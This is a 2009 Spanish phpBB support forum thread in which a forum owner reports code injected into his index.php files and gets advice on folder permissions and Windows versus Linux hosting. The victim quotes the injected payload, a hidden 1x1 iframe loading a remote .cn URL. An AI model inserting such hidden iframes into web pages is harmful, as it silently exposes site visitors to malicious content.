phpBB España Oficial

phpBB España Oficial, Soporte Internacional Oficial del sistema de foros phpBB en Español, extensiones, estilos, traducciones, guías, tutoriales, videos, redes sociales, webmaster.
https://www.phpbb-es.com/foro/

INYECCIÓN CÓDIGO EN INDEX.PHP

https://www.phpbb-es.com/foro/viewtopic.php?t=19875

Página 1 de 1

INYECCIÓN CÓDIGO EN INDEX.PHP

Publicado: 09 Ene 2009, 09:17
por gorka_arai
URL: http://piperrak.org/public/foro" onclick="window.open(this.href);return false;
Versión phpBB: phpBB3 (3.0.4)
MODs Instalados: Ninguno
Plantilla(s) usada(s): Black_Pearl
Servidor: Windows (de pago) - aruba.it
Actualización desde otra versión: No
Conversión desde otro sistema de foros: No

Buenas maestros,
estoy muy preocupado ya que ayer mismo terminé de instalar y configurar mi flamante nuevo foro phpbb 3.0.4 y esta mañana cuando he ido a visitarlo el navegador decía algo así como que faltaba un ? de cierre en index.php!!!
Cuál ha sido mi sorpresa cuando he comprobado que me han inyectado código en estos dos archivos:

/index.php
/includes/hooks/index.php

El código que han inyectado es un frame de publicidad:

?<html><body><iframe src="http://litedownloadseek.cn/in.cgi?cocacola8" width=1 height=1 style="visibility: hidden"></iframe></body></html>>

Me preocupa muchísimo cómo lo han hecho. Me imagino que algo se me escapa o que quizá no haya terminado de cerrar los agujeros de seguridad. Los permisos de todas las carpetas del foro son 666 (¿Es correcto?)
Alguna idea de cómo lo han hecho?

Re: INYECCIÓN CÓDIGO EN INDEX.PHP

Publicado: 09 Ene 2009, 09:57
por ThE KuKa
No es correcto CHMOD 666 para todas las carpetas, verifica los permisos CHMOD de archivos y carpetas, mira en el foro de guías.

S@lu2

Re: INYECCIÓN CÓDIGO EN INDEX.PHP

Publicado: 09 Ene 2009, 12:06
por gorka_arai
Gracias por tu respuesta Kuka. Ahora me encuentro con que no puedo cambiar los permisos de las carpetas... Y eso que mi foro está alojado dentro de la carpeta "Public" (que es una carpeta por defecto y se supone que debería poder cambiar los permisos a mi antojo no?)

Re: INYECCIÓN CÓDIGO EN INDEX.PHP

Publicado: 09 Ene 2009, 12:52
por gorka_arai
Esto es desesperante, en apenas unas horas alguien o algo está inyectando código en mis index.php (el código que inyecta es el del post de arriba). Cómo lo hace? Cómo debo protegerme? Y sobre todo: A qué se debe este problema? Es por colocar mi foro en la carpeta predeterminada del hosting "Public"?

Re: INYECCIÓN CÓDIGO EN INDEX.PHP

Publicado: 09 Ene 2009, 12:55
por ThE KuKa
Tu servidor es Windows, no puedes modificar los permisos de archivos y carpetas, eso lo debe hacer tu hosting.

Mira en el foro de guías de phpBB 3, contacta con Aruba y diles que permisos requiere cada carpeta y/o archivo.

S@lu2

Re: INYECCIÓN CÓDIGO EN INDEX.PHP

Publicado: 09 Ene 2009, 13:16
por HuanManwe
O mejor aún, diles que te pasen tu web a un servidor Linux. En aruba.it tienen el mismo precio que el hospedaje en servidores Windows, así que con suerte te lo moverán sin problemas. Entonces sí podrás dar permisos.
Todos los horarios son UTC+02:00
Página 1 de 1

Desarrollado por phpBB® Forum Software © phpBB Limited

Traducción al español por phpBB España